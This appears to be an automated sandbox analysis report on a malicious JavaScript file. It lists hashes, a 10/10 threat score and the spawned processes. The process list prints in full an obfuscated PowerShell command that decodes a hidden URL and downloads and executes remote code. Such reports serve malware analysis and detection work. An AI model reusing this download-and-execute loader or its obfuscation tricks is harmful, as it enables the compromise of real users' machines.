Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
27/09/2024, 01:40
General
-
Target
b112b5e7950778c3e5891c5ec79010a1f4c681a0a23c73e2518b5665d3a0ae44.js
-
Size
167KB
-
MD5
faec80378a6074cb0d68cacd08df67cc
-
SHA1
37fb3d2cf0c73fc164398e79de89247ef414a09a
-
SHA256
b112b5e7950778c3e5891c5ec79010a1f4c681a0a23c73e2518b5665d3a0ae44
-
SHA512
b6473fea6758a43283bae16a843444080c0008d6179efa6c25ffbf893df203cebca29bcc20638cf2fd648ef5f9ab326dbaf85a423a484c18a002bee1062e187c
-
SSDEEP
3072:j63A2MfujbFmeYXrDUFV5rOclbey2fHfCL5SVZnjmr+2milMZqGD/:j63VN+X3Uxlt2f6Ly5c+wCj
Score
10/10
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\b112b5e7950778c3e5891c5ec79010a1f4c681a0a23c73e2518b5665d3a0ae44.js1⤵
-
C:\Windows\system32\conhost.execonhost --headless powershell $qicynpgppvx='ur';new-alias press c$($qicynpgppvx)l;$bgveyqcu=(1806,1824,1810,1816,1811,1807,1816,1809,1823,1822,1826,1820,1822,1751,1821,1816,1817,1752,1754,1751,1817,1809,1817,1768,1820,1766,1814,1810,1815,1821,1820,1754,1756);$lgusiksrhy=('bronx','get-cmdlet');$atqqurkq=$bgveyqcu;foreach($vqfdpfmqyu in $atqqurkq){$aoepaink=$vqfdpfmqyu;$zdriqyzcmfqtj=$zdriqyzcmfqtj+[char]($aoepaink-1705);$aowflg=$zdriqyzcmfqtj;$vylthsumvnxya=$aowflg};$xotsya[2]=$vylthsumvnxya;$dhrbgov='rl';$apyixpo=1;.$([char](9992-9887)+'e'+'x')(press -useb $vylthsumvnxya)1⤵
- Process spawned unexpected child process